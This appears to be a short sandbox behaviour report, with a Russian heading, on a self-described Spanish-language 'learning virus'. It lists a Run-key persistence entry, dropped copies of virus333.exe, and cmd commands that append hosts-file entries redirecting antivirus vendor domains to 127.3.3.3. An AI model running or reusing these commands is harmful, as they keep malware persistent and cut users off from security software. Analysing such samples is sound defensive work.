Техническая информация
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\run] 'virus' = 'C:\virus333.exe'
- <Текущая директория>\virus333.exe
- C:\virus333.exe
- C:\333.txt
- <Текущая директория>\virus333.exe
- DNS ASK google.com
- '%WINDIR%\syswow64\cmd.exe' /c echo Este es un archivo de prueba de la secuencia que ejecuta un MALWARE > virus333.exe
- '%WINDIR%\syswow64\cmd.exe' /c copy virus333.exe c:\virus333.exe
- '%WINDIR%\syswow64\cmd.exe' /c del virus333.exe
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\ping.exe -n 1 google.com >> c:\333.txt
- '%WINDIR%\syswow64\ping.exe' -n 1 google.com
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 avg.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 www.av#.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 eset.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 www.es##.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 avira.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 www.av##a.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\msg.exe * PRESIONE F3 PARA DETENER ESTE VIRUS DE APRENDISAJE